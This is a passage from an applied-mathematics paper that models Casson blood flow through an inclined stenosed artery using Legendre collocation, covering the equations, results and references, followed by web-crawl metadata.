parameter. The geometry illustration of the stenosis located at the point, $$z$$ with its maximum height, $$\\delta$$ is defined by the following formula:\n\n$$h\\left( {\\tilde{z}} \\right) = \\left[ {1 - \\eta \\left( {b^{n - 1} \\left( {\\tilde{z} - a} \\right) - \\left( {\\tilde{z} - a} \\right)^{n} } \\right)} \\right]d\\left( {\\tilde{z}} \\right),\\quad {\\text{where}}\\;a \\le \\tilde{z} \\le a + b,\\quad h\\left( {\\tilde{z}} \\right) = d\\left( {\\tilde{z}} \\right),\\,\\,{\\text{otherwise}},$$\n(8)\n\nwhere $$d\\left( {\\tilde{z}} \\right)$$ is the radius of the narrow artery in the stenotic region with $$d\\left( {\\tilde{z}} \\right) = d_{0} + \\xi \\widetilde{z,}$$ In (8), n is the shape parameter which determines the shape of the constriction profile. The value $$n = 2$$ results in symmetrically shaped stenosis, and for nonsymmetric stenosis case $$n$$ considers the values $$n \\ge 2$$. 
$$\xi$$ is the narrowing (tapering) parameter defined by $$\xi = {\text{tan}}\varphi$$, where $$\varphi$$ is the taper angle of the artery, and $$d_{0}$$ is the radius of the non-narrowed artery.\n\nThe parameter $$\eta$$ is defined as\n\n$$\eta = \frac{{\delta^{*} n^{{\frac{n}{n - 1}}} }}{{d_{0} b^{n} \left( {n - 1} \right)}}$$\n(9)\n\nwhere $$\delta$$ is the maximum height of the stenosis located at\n\n$$\tilde{z} = a + \frac{b}{{n^{{\frac{n}{n - 1}}} }}.$$\n(10)\n\n## Method of solution\n\nTo non-dimensionalize the obtained governing equations, we introduce the non-dimensional variables as follows:\n\n$$\begin{gathered} \;\tilde{u} = \frac{{uu_{0} \delta }}{b},\;\;\tilde{r} = rd_{0\;} ,\;\;\tilde{z} = zb\;,\;\;\tilde{v} = wu_{0\;} ,\;\;\tilde{h} = hd_{0} ,\;\;\tilde{P} = \frac{{u_{0} b\mu_{0} p}}{{d_{0}^{2} }}\;, \hfill \\ {\text{Re}} = \;\frac{{\rho bu_{0} }}{{\mu_{0} }},\,\,\theta = \frac{{T - T_{0} }}{{T_{0} }},\,\,\;\Pr = \frac{{\mu c_{p} }}{k},\;\,\,{\text{Ec}} = \frac{{\mu_{0}^{2} }}{{c_{{pT_{0} }} }},\;\,\,Z = \frac{{k_{1} }}{{d_{0}^{2} }}\;, \hfill \\ M = \frac{{\sigma_{1} H_{0}^{2} d_{0}^{2} }}{{\mu_{0} }}\;,\;\,\,Q = A\frac{{d_{0}^{2} }}{K}\;,\;\,G_{r} = \frac{{g\alpha d_{0}^{3} T_{0} }}{{v^{2} }},\,\;N^{2} = \frac{{4d_{0}^{2} \alpha_{v}^{2} }}{k}\;,\,\,G_{{\text{N}}} = \frac{{\alpha_{2} }}{{\alpha_{1} }}T_{0} . \hfill \\ \end{gathered}$$\n(11)\n\nwhere $$\Pr ,\;Z,\;N,\;{\text{Re}},\;\theta ,\;{\text{Gr}},\;M,\;{\text{Ec}},\;{\text{and}}\;G_{{\text{N}}}$$, respectively, represent the Prandtl number, porosity parameter, radiation absorption parameter, Reynolds number, dimensionless temperature, Grashof number, magnetic field parameter, Eckert number, and nonlinear thermal convection parameter. 
In the case of aortic stenosis $$\\frac{\\delta }{{d_{0} }}{ \\ll }1$$ and the other additional conditions,\n\n$${\\text{Re}} \\frac{{\\delta^{*} n^{{\\frac{1}{n - 1}}} }}{b} \\ll 1,$$\n(12)\n\nassuming the following approximation:\n\n$$\\frac{{d_{0\\;} n^{{\\frac{1}{n - 1}}} }}{b}\\; \\sim \\;O\\left( 1 \\right),$$\n(13)\n\nTo non-dimensionalize the continuity equation, we substitute the non-dimensional quantities in (11) into (1) to obtain:\n\n$$\\frac{{u_{0} \\delta }}{{bd_{0} }}\\frac{\\partial u}{{\\partial r}} + \\frac{{uu_{0} \\delta }}{{rbd_{0} }} + \\frac{{u_{0} }}{b}\\frac{\\partial w}{{\\partial z}} = 0,$$\n(14)\n\nSince $$\\frac{\\delta }{{d_{0} }}{ \\ll }1$$,\n\n$$\\frac{{u_{0} }}{b}\\frac{\\partial w}{{\\partial z}} = 0,$$\n(15)\n$$\\frac{\\partial w}{{\\partial z}} = 0.$$\n(16)\n\nTo non-dimensionalize the momentum equation ($$r$$-direction), substitute (11) into (2) to obtain:\n\nAlso, since $$\\frac{\\delta }{{d_{0} }}{ \\ll }1$$, $$\\frac{\\partial w}{{\\partial z}} = 0$$,\n\n$$- \\frac{{u_{0} b\\mu_{0} }}{{d_{0}^{3} }}\\frac{\\partial p}{{\\partial z}} = 0,$$\n(17)\n$$\\frac{\\partial p}{{\\partial z}} = 0.$$\n(18)\n\nAlso, substituting the non-dimensional variables in (11) and (7) into the momentum equation (z-direction):\n\n\\begin{aligned} \\frac{\\partial p}{{\\partial z}} & = \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {H_{r} \\left( {\\frac{1}{r} - r^{m - 1} \\left( {m + 1} \\right)} \\right)} \\right]\\frac{\\partial w}{{\\partial r}} + \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {1 + H_{r} \\left( {1 - r^{m} } \\right)} \\right]\\frac{{\\partial^{2} w}}{{\\partial r^{2} }}wM^{2} \\\\ & \\quad + G_{r} \\left[ {\\theta + G_{{\\text{N}}} \\theta^{2} } \\right]\\cos \\gamma \\; - w\\left( {1 + \\frac{1}{\\beta }} \\right)\\frac{{H_{r} }}{Z}\\left( {1 - r^{m} } \\right) - \\frac{{b^{*} w^{2} d_{0}^{2} }}{{k_{1} }}, \\\\ \\end{aligned}\n(19)\n\nwhere $$G_{N} = \\frac{{\\alpha_{2} T_{0} }}{{\\alpha_{1} }}$$ is the nonlinear thermal convection.\n\nAlso, using the non-dimensional variables in Eq. (11), the energy equation becomes\n\n$$\\frac{1}{r}\\frac{\\partial }{\\partial r}\\left( {r\\frac{\\partial \\theta }{{\\partial r}}} \\right) + \\;{\\text{Ec}}\\Pr \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {1 + H_{r} \\left( {1 - r^{m} } \\right)} \\right]\\left( {\\frac{\\partial w}{{\\partial r}}} \\right)^{2} - N^{2} \\theta = 0,$$\n(20)\n\nwhere $$B_{r} = \\;{\\text{Ec}}\\Pr$$ Brinkman number ($$B_{r}$$) is a dimensionless number used to study viscous flow. The corresponding boundary conditions are\n\n$$\\;\\frac{\\partial \\theta }{{\\partial r}} = 0,\\;\\,\\,\\,\\frac{\\partial w}{{\\partial r}} = 0,\\;\\;\\;\\;at\\;\\;r = 0,$$\n(21)\n\nand the no-slip boundary conditions (assuming that at a solid boundary, the fluid will have zero velocity relative to the boundary) at the artery wall\n\n$$\\;w = 0,\\,\\,\\,\\theta = 0,\\quad {\\text{at}}\\;\\;r = h\\left( z \\right),$$\n(22)\n\nwhere h(z) is defined by\n\n$$\\begin{gathered} h(z) = \\left( {1 + \\xi^{\\prime } z} \\right)\\left[ {1 - \\eta_{1} \\left( {(z - a^{\\prime } ) - (z - a^{\\prime } )^{n} } \\right)} \\right], \\hfill \\\\ \\;\\;{\\text{where}}\\;a^{\\prime } \\le z \\le a^{\\prime } + 1 \\hfill \\\\ \\end{gathered}.$$\n(23)\n\nWith the use of the Legendre collocation method, we have to define some functions. Let $$P_{n} (x)$$ be the Legendre polynomial function of degree $$n$$. 
We recall that $$P(x)$$ is the solution (eigenfunction) of the Sturm–Liouville problem as follows:\n\n\\begin{aligned} & \\left[ {\\left( {1 - x^{2} } \\right)P_{n}^{^{\\prime}} \\left( x \\right)} \\right]^{^{\\prime}} + n\\left( {n + 1} \\right)p_{n} \\left( x \\right) = 0, \\\\ & x \\in \\left[ { - 1,1} \\right],\\;n = 0,1,2,3, \\ldots \\\\ \\end{aligned}.\n(24)\n\nEquation (24) satisfies the recursive relations:\n\n$$P_{0} \\left( x \\right) = 1\\;,\\;P_{1} \\left( x \\right) = x\\;,\\;P_{2} \\left( x \\right) = \\frac{1}{2}\\left( {3x^{2} - 1} \\right),$$\n(25)\n$$P_{n} \\left( x \\right) = \\;\\frac{2n - 1}{n}\\;x\\;P_{n - 1} \\left( x \\right) - \\;\\frac{n - 1}{n}P_{n - 2} \\left( x \\right)\\;\\;;n \\ge 1,$$\n(26)\n\nThe set of Legendre polynomials from a [− 1,1] orthogonal set is\n\n$$\\int_{ - 1}^{1} P_{n} \\left( x \\right)P_{m} \\left( x \\right)\\;w\\left( x \\right){\\text{d}}x = \\;\\frac{2}{2n + 1}\\delta_{m,n} ,$$\n(27)\n\nwhere $$\\delta_{m,n}$$ is the Kronecker delta function. To apply the Legendre polynomial to the problem with a semi-infinite domain, we introduce algebraic mapping\n\n$$x = \\frac{2\\varsigma }{h} - 1,[ - 1,1] \\to [0,h],$$\n(28)\n\nthe boundary value problem is solved within the region [0, $$h$$] in place of [0,$$\\infty$$), whereas the scaling parameter is taken to be sufficiently large enough to evaluate the thickness of the boundary layer. Therefore, the real solutions $$f\\left( \\varsigma \\right)$$ and $$\\theta \\left( \\varsigma \\right)$$ are expressed as the basis of the Legendre polynomial function as\n\n$$f\\left( \\varsigma \\right) = \\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( \\varsigma \\right),\\;\\;\\,\\,\\theta \\left( \\varsigma \\right) = \\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( \\varsigma \\right),\\,\\,\\,{\\text{for}}\\quad j = 0,1,2,3, \\ldots ,$$\n(29)\n\nHence,\n\n$$\\begin{gathered} f\\left( \\varsigma \\right) = a_{0} P_{0} \\left( \\varsigma \\right) + a_{1} P_{1} \\left( \\varsigma \\right) + a_{2} P_{2} \\left( \\varsigma \\right) + \\cdots , \\hfill \\\\ \\theta \\left( \\varsigma \\right) = b_{0} P_{0} \\left( \\varsigma \\right) + b_{1} P_{1} \\left( \\varsigma \\right) + b_{2} P_{2} \\left( \\varsigma \\right) + \\cdots , \\hfill \\\\ \\end{gathered}$$\n(30)\n\nwhere $$P_{0} \\left( \\varsigma \\right)$$, $$P_{1} \\left( \\varsigma \\right)$$, $$P_{2} \\left( \\varsigma \\right)$$,…,$$P_{n} \\left( \\varsigma \\right)$$ are generated from recursive relation in (26) and\n\n$$P_{0} \\left( \\varsigma \\right) = 1\\;,\\;P_{1} \\left( \\varsigma \\right) = \\varsigma \\;,\\;P_{2} \\left( \\varsigma \\right) = \\frac{1}{2}\\left( {3\\varsigma^{2} - 1} \\right), \\ldots$$\n(31)\n\nHence, substituting Eq. (31) into (30)\n\n$$f\\left( \\varsigma \\right) = a_{0} + a_{1} \\left( {\\frac{2\\varsigma }{h} - 1} \\right) + \\frac{{a_{2} }}{2}\\left[ {3\\left( {\\frac{2\\varsigma }{h} - 1\\;} \\right)^{2} - 1} \\right] + \\cdots ,$$\n(32)\n$$\\theta \\left( \\varsigma \\right) = b_{0} + b_{1} \\left( {\\frac{2\\varsigma }{h} - 1} \\right) + \\frac{{b_{2} }}{2}\\left[ {3\\left( {\\frac{2\\varsigma }{h} - 1\\;} \\right)^{2} - 1} \\right] + \\cdots ,$$\n(33)\n\nfor $$h = 6$$ and $$N = 6$$, Eqs. 
(3233) become\n\n$$f\\left( \\varsigma \\right) = a_{0} + \\frac{{a_{1} }}{6}\\left( { - 6 + 2\\varsigma } \\right) + \\frac{{a_{2} }}{6}\\left[ {6 - 6\\varsigma + \\varsigma^{2} } \\right] + \\cdots$$\n(34)\n$$\\theta \\left( \\varsigma \\right) = b_{0} + \\frac{{b_{1} }}{6}\\left( { - 6 + 2\\varsigma } \\right) + \\frac{{b_{2} }}{6}\\left[ {6 - 6\\varsigma + \\varsigma^{2} } \\right] + \\cdots$$\n(35)\n\nWe assumed that $$w(r)$$ and $$\\theta (r)$$ are the Legendre base trial functions, defined by\n\n$$w(z) = \\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( {\\frac{2z}{h} - 1\\;} \\right),\\;\\theta (r) = \\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1\\;} \\right),$$\n(36)\n\nwhere $$a_{j}$$ and $$b_{j}$$ are constants to be determined and $$P_{j} \\left( {\\frac{2r}{h} - 1} \\right)$$ is the shifted Legendre function from $$[ - 1,1]$$ to $$[0,h]$$. Substituting (36) into the boundary conditions in (21) and (22), respectively, we have\n\n$$\\begin{array}{*{20}l} {\\left[ {\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right]_{r = 0} = 0} \\hfill \\\\ \\end{array} ,\\;\\begin{array}{*{20}l} {\\left[ {\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right]_{r = 0} = 0} \\hfill \\\\ \\end{array} ,$$\n(37)\n$$\\begin{array}{*{20}l} {\\left[ {\\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right]_{r = h\\left( z \\right)} = 0} \\hfill \\\\ \\end{array} ,\\;\\begin{array}{*{20}l} {\\left[ {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right]_{r = h\\left( z \\right)} = 0} \\hfill \\\\ \\end{array} ,$$\n(38)\n\nResidues $$D_{w} \\left( {r,a_{j} ,b_{j} } \\right)$$ and $$D_{\\theta } \\left( {r,a_{j} ,b_{j} } \\right)$$ are derived from the above (39) and (40) accordingly.\n\nThe residues are minimized close to zero using the collocation method as follows:\n\n$$\\begin{array}{*{20}l} {{\\text{for}}\\;\\delta \\left( {r - r_{j} } \\right) = \\left\\{ {\\begin{array}{*{20}c} {1,} & {t = t_{j} } \\\\ {0,} & {{\\text{otherwise}},} \\\\ \\end{array} } \\right.} \\hfill \\\\ \\end{array}$$\n$$\\begin{array}{*{20}l} {\\int_{0}^{1} D_{w} \\delta \\left( {r - r_{j} } \\right){\\text{d}}r = D_{f} \\left( {r_{j} ,a_{k} ,b_{k} } \\right) = 0,\\;\\;\\;{\\text{for}}\\;j = 1,\\;2, \\ldots N - 1} \\hfill \\\\ \\end{array}$$\n(39)\n$$\\begin{array}{*{20}l} {\\int_{0}^{1} D_{\\theta } \\delta \\left( {r - r_{j} } \\right)dr = D_{\\theta } \\left( {r_{j} ,a_{k} ,b_{k} } \\right) = 0,\\;\\;\\;{\\text{for}}\\;j = 1,\\;2,..N - 1} \\hfill \\\\ \\end{array}$$\n(40)\n\nThe above procedure sought the unknown constant coefficients $$a_{j} ,$$ and $$b_{j}$$ which are then substituted in Eq. (36) as the required solution.\n\n## Results and discussion\n\nMathematica 11.3 is used to obtain the numerical results for the temperature and velocity variation. The parameters used include the inclination of the angle $$\\left( \\gamma \\right)$$ of the artery, Casson parameter $$\\left( \\beta \\right)$$, porosity parameter $$\\left( Z \\right)$$, the height of the stenosis $$\\left( \\delta \\right)$$, Darcy–Brinkman–Forchheimer term $$\\left( {F_{s} } \\right)$$, and nonlinear thermal convection term $$\\left( {G_{{\\text{n}}} } \\right)$$. 
The following parameter values were used in plotting the graphs: $$z = 0.5,\;\delta = 0.1,\;N = 1.5,\;\gamma = \frac{\pi }{3},\;a = 0.25,\;b = 1,\;\xi = 0.002,\;{\text{Ec}} = 1,\;\Pr = 2,\;{\text{Gr}} = 2,\;n = 2,\;h = 0.92,\;\frac{\partial P}{{\partial z}} = 3,\;H_{r} = 1,\;{\text{and}}\;d_{0} = 1$$.\n\nFigure 2a shows the effect of variation of the inclination angle parameter ($$\gamma$$) on the velocity profile. There is an increase in the velocity of the blood flow in the artery as the angle of inclination ($$\gamma$$) increases.\n\nFigure 2b displays the effect of the introduced nonlinear thermal convection parameter ($$G_{N}$$) on the velocity profile. It is seen from Fig. 2b that the velocity profile decreases with increasing values of the nonlinear thermal convection parameter ($$G_{N}$$). Figure 2c depicts the effect of the Casson parameter (β); it shows that as β increases from 0.2 to 1.0, the velocity increases at the arterial wall.\n\nFigure 3a shows the effect of variation of the inclination angle parameter (γ) on the temperature profile. There is an increase in the temperature of the blood flow in the artery as the inclination angle ($$\gamma$$) increases.\n\nFrom Fig. 3b, it is clear that as the value of the nonlinear thermal convection parameter increases, the temperature profile decreases. It is observed through these figures that the velocity and temperature achieve their maximum values at the wall of the artery and attain their minimum values at the middle of the artery for the nonlinear thermal convection parameter. From Fig. 3c, it is seen that as the value of the Casson parameter (β) increases, the temperature profile decreases at the arterial wall, possibly because the viscous nature of the fluid weakens with increasing temperature.\n\n## Conclusion\n\nIn this paper, we studied the Casson rheological flow of blood in an inclined stenosed artery with a non-Darcian porous medium and quadratic thermal convection. The collocation method with Legendre polynomial basis functions was used to solve the nonlinear governing equations. 
From the velocity and temperature profiles, it is concluded that: (i) as the angle of inclination parameter (γ) increases, both the blood flow velocity and temperature increase; (ii) with an increase in the value of the nonlinear thermal convection parameter (Gn), the velocity and the temperature of the blood flow decrease; and (iii) an increase in the Casson parameter (β) produces a decrease in both the velocity and the temperature of the blood flow.\n\n## Availability of data and materials\n\nNot applicable.\n\n## Abbreviations\n\n$$\tilde{u}$$, $$\tilde{v}$$ and $$\tilde{w}$$ :\n\nVelocity components in the $$r$$, $$\theta$$, and $$z$$ directions\n\n$$\rho$$ :\n\nFluid density\n\n$$\gamma$$ :\n\nAngle of inclination of the artery\n\n$$\mu$$ :\n\nVariable viscosity\n\n$$L$$ :\n\nTube length\n\n$$q_{{\text{r}}}$$ :\n\nRadiative heat flux\n\n$$M$$ :\n\nMagnetic field parameter\n\n$$\sigma_{1}$$ :\n\nElectrical conductivity\n\n$$k$$ :\n\nThermal conductivity\n\n$$C_{{\text{p}}}$$ :\n\nSpecific heat at constant pressure\n\n$$T_{0}$$ :\n\nBlood temperature at the stenosed region\n\nT :\n\nLocal temperature of the blood\n\nH :\n\nMaximum hematocrit at the center of the artery\n\n$$H_{r}$$ :\n\nHematocrit parameter\n\n$$d\left( {\tilde{z}} \right)$$ :\n\nRadius of the narrow artery in the stenotic region\n\n$$d_{0}$$ :\n\nRadius of the non-narrowed artery\n\n$$\delta$$ :\n\nMaximum height of the stenosis\n\n$$\Pr$$ :\n\nPrandtl number\n\n$$Z\;$$ :\n\nPorosity parameter\n\n$$N$$ :\n\nRadiation absorption parameter\n\n$${\text{Re}}$$ :\n\nReynolds number\n\n$$\theta$$ :\n\nDimensionless temperature parameter\n\n$${\text{Gr}}$$ :\n\nGrashof number\n\n$${\text{Ec}}$$ :\n\nEckert number\n\n$$G_{{\text{N}}}$$ :\n\nNonlinear thermal convection parameter\n\n$$f$$ :\n\nDimensionless fluid velocity\n\n## References\n\n1. Abubakar, J.U., Gbedeyan, J.A., Ojo, J.B.: Steady blood flow through vascular stenosis under the influence of magnetic field. Centrepoint J. (Sci. Ed.) 25(1), 61–82 (2019)\n\n2. Abubakar, J.U., Adeoye, A.D.: Effects of radiative heat and magnetic field on blood flow in an inclined tapered stenosed porous artery. J. Taibah Univ. Sci. 14(1), 77–86 (2020). https://doi.org/10.1080/16583655.2019.1701397\n\n3. Akbarzedeh, P.: Pulsatile magneto-hydrodynamic blood flows through porous blood vessels using a third grade non-Newtonian fluids model. Comput. Methods Progr. Biomed. 126, 3–19 (2016)\n\n4. Beckermann, C., Viskanta, R., Ramadhyani, S.: A numerical study of non-Darcian natural convection in a vertical enclosure filled with a porous medium. Numer. Heat Transf. 10, 557–570 (1986)\n\n5. Bhargava, R., Anwar, O., Rawat, S., Beg, T.A., Triphati, D.: Finite element study of transient pulsatile magneto-hemodynamic non-Newtonian flow and drug diffusion in a porous medium channel. J. Mech. Med. Biol. 12(14), 1250081 (2012)\n\n6. Bhatti, M.M., Abdelsalam, S.I.: Bio-inspired peristaltic propulsion of hybrid nanofluid flow with Tantalum (Ta) and Gold (Au) nanoparticles under magnetic effects. Waves Random Complex Med. (2021). https://doi.org/10.1080/17455030.2021.1998728\n\n7. Chaturani, P., Samy, R.P.: Pulsatile flow of Casson’s fluid through stenosed arteries with applications to blood flow. Biorheology 23(5), 499–511 (1986)\n\n8. Elnaqeeb, T., Sheh, N.A., Mekheimer, K.S.: Hemodynamic characteristics of gold nanoparticle blood flow through a tapered stenosed vessel with variable nanofluid viscosity. BioNanoScience 9(2), 245–255 (2019)\n\n9. Guner, A., Yalcinbas, S.: Legendre collocation method for solving nonlinear differential equations. Math. Comput. Appl. 18(3), 521–530 (2013)\n\n10. 
Hayat, T., Haider, F., Muhammad, T., Alsaedi, A.: Darcy–Forchheimer flow with Cattaneo–Christov homogeneous-heterogeneous. PLoS ONE 12(2017), 1–18 (2017)\n\n11. Ikbar, M.A., Chakravarty, S., Kelvin, K.L., Wong, M.J., Mandal, P.K.: Unsteady response of non-newtonian blood flow through a stenosed artery in magnetic field. J. Comput. Appl. Math. 230(1), 243–259 (2009)\n\n12. Krishna, M.M.: Effect of heat and mass flux conditions on Magnetohydrodynamics flow of Casson fluid over a curved stretching surface (2019). https://doi.org/10.4028/www.scientific.net/DDF.392.29\n\n13. Krishna, M.M.: Numerical investigation on magnetohydrodynamics flow of Casson fluid over a deformable porous layer with slip conditions. Indian J. Phys. (2019). https://doi.org/10.1007/s12648-019-01668-4\n\n14. Mallawi, F., Alzaidy, J.F., Hafez, R.M.: Application of a Legendre collocation method to the space-time variable fractional-order advection-dispersion equation. J. Taibah Univ. Sci. 13, 2019 (2018)\n\n15. Mandal, P.K., Chakravarthy, S., Mandal, A., Amin, N.: Effect of the body acceleration on unsteady pulsatile flow of non-Newtonian fluid through a stenosed artery. Appl. Math. Comput. 189, 766–779 (2007)\n\n16. Mustafa, T.: Eyring-Powell fluid flow through a circular pipe and heat transfer: full solutions. Int. J. Numer. Meth. Heat Fluid Flow 30(11), 4765–4774 (2020). https://doi.org/10.1108/hff-12-2019-0925\n\n17. Poonam, Sharma, B.K., Kumawat, C., Vafai, K.: Computational biomedical simulations of hybrid nanoparticles (blood-mediated) transport in a stenosed and aneurysmal curved artery with heat and mass transfer: hematocrit dependent viscosity approach. Chem. Phys. Lett. 800, 139666 (2022)\n\n18. Sharma, B.K., Rishu Gandhi, M.M.: Bhatti, Entropy analysis of thermally radiating MHD slip flow of hybrid nanoparticles (Au–Al2O3/Blood) through a tapered multi-stenosed artery. Chem. Phys. Lett. 790, 139348 (2022). https://doi.org/10.1016/j.cplett.2022.139348\n\n19. Tripathi, B., Kumar, B.S.: MHD blood flow and heat transfer through an inclined porous stenosed artery with variable viscosity. J. Taibah Univ. Sci. 14(1), 77–86 (2019). https://doi.org/10.1080/16583655.2019.1701397\n\n20. Turkyilmazoglu, M.: Velocity slip and entropy generation phenomena in thermal transport through metallic porous channel. J. Non-Equilib. Thermodyn (2020). https://doi.org/10.1515/jnet-2019-0097\n\nNot applicable.\n\n## Funding\n\nIt was funded by authors.\n\n## Author information\n\nAuthors\n\n### Contributions\n\nJUA and QAO formulate the model and JUA, QAO, KAB, and AMB solved the model, drew the graphs presented, discussed the results, and presented the conclusions. All authors read and approved the final manuscript.\n\n### Corresponding author\n\nCorrespondence to J. U. Abubakar.\n\n## Ethics declarations\n\n### Competing interests\n\nWe, the authors, declare that there are no competing interests.\n\n### Publisher's Note\n\nSpringer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.\n\n## Appendix 1\n\n### Appendix 1\n\nAlso, on substituting (38) into the governing Eq. 
(20), we obtain\n\n\\begin{aligned} D_{w} : & = \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {H_{r} \\left( {\\frac{1}{r} - \\left( {m + 1} \\right)r^{m - 1} } \\right)} \\right]\\left[ {\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right] + \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {1 + H_{r} \\left( {1 - r^{m} } \\right)} \\right]\\frac{{{\\text{d}}^{2} }}{{{\\text{d}}r^{2} }}\\left[ {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right] \\\\ & \\quad - \\left( {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right)M^{2} + G_{r} \\left[ {\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right) + G_{N} \\left( {\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right)^{2} } \\right]\\cos \\gamma \\; - \\left( {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right) \\\\ & \\quad + \\left( {1 + \\frac{1}{\\beta }} \\right)\\frac{{H_{r} }}{Z}\\left( {1 - r^{m} } \\right) - \\frac{{b^{*} \\left( {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right)^{2} d_{0}^{2} }}{{k_{1} }} - \\frac{{\\text{d}}}{{{\\text{d}}z}}\\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( {\\frac{2z}{h} - 1} \\right), \\\\ \\end{aligned}\n(41)\n\\begin{aligned} D_{\\theta } : & = \\frac{1}{r}\\frac{{\\text{d}}}{{{\\text{d}}r}}\\left( {r\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right) + \\;E_{c} P_{r} \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {1 + H_{r} \\left( {1 - r^{m} } \\right)} \\right] \\\\ & \\quad \\times \\left( {\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right)^{2} - N^{2} \\left( {\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right). \\\\ \\end{aligned}\n(42)\n\n## Rights and permissions", null, "" ]
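As a companion to the method described above, the following Python sketch illustrates the Legendre-basis collocation idea on a deliberately simple toy boundary value problem (my own example, not the paper's coupled Casson-flow system): solve u''(r) = −1 on [0, 1] with u'(0) = 0 and u(1) = 0, mirroring the symmetry and no-slip conditions in Eqs. (21)–(22); the exact solution is u(r) = (1 − r²)/2.

```python
import numpy as np
from numpy.polynomial import legendre as L

N = 6    # highest Legendre degree in the trial expansion
h = 1.0  # domain [0, h], mapped to [-1, 1] via x = 2r/h - 1

def basis(r, order):
    """Matrix of d^order/dr^order P_j(2r/h - 1), j = 0..N, evaluated at points r."""
    x = 2 * np.asarray(r) / h - 1
    cols = []
    for j in range(N + 1):
        c = np.zeros(j + 1)
        c[j] = 1                                    # coefficients of P_j alone
        d = L.legder(c, order) if order else c      # differentiate in x
        cols.append(L.legval(x, d) * (2 / h) ** order)  # chain rule: dx/dr = 2/h
    return np.column_stack(cols)

# Interior collocation points plus the two boundary conditions.
r_int = 0.5 * h * (1 - np.cos(np.pi * np.arange(1, N) / N))
A = np.vstack([
    basis(r_int, 2),   # residual rows: u''(r_i) = -1
    basis([0.0], 1),   # u'(0) = 0
    basis([h], 0),     # u(h) = 0
])
b = np.concatenate([-np.ones(N - 1), [0.0, 0.0]])
coef = np.linalg.solve(A, b)  # square (N+1) x (N+1) system

r_test = np.linspace(0, h, 5)
u = basis(r_test, 0) @ coef
print(np.allclose(u, (1 - r_test**2) / 2))  # True: the quadratic is recovered exactly
```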
[ null, "https://joems.springeropen.com/track/article/10.1186/s42787-022-00157-8", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8287909,"math_prob":0.9998648,"size":23527,"snap":"2023-40-2023-50","text_gpt3_token_len":6142,"char_repetition_ratio":0.13276368,"word_repetition_ratio":0.06262864,"special_character_ratio":0.2653122,"punctuation_ratio":0.15373898,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999671,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-29T13:12:19Z\",\"WARC-Record-ID\":\"<urn:uuid:7affdebf-39f1-4982-8f82-1a1ca9889de2>\",\"Content-Length\":\"340751\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f9ca1121-cf2f-4d22-b74e-360924508675>\",\"WARC-Concurrent-To\":\"<urn:uuid:6d306f6b-6dfc-46e7-8f5c-e26f17110ea2>\",\"WARC-IP-Address\":\"146.75.32.95\",\"WARC-Target-URI\":\"https://joems.springeropen.com/articles/10.1186/s42787-022-00157-8\",\"WARC-Payload-Digest\":\"sha1:KA73MQCCODFM4DX36YCBT7AV7NG3EVC7\",\"WARC-Block-Digest\":\"sha1:U44TOUSYZRXFPEK5FU2FRBMRO7IWRTGS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100081.47_warc_CC-MAIN-20231129105306-20231129135306-00205.warc.gz\"}"}
https://mathschoolinternational.com/Physics-Books/Mechanics/Classical-Mechanics-2E--Tai-Chow.aspx
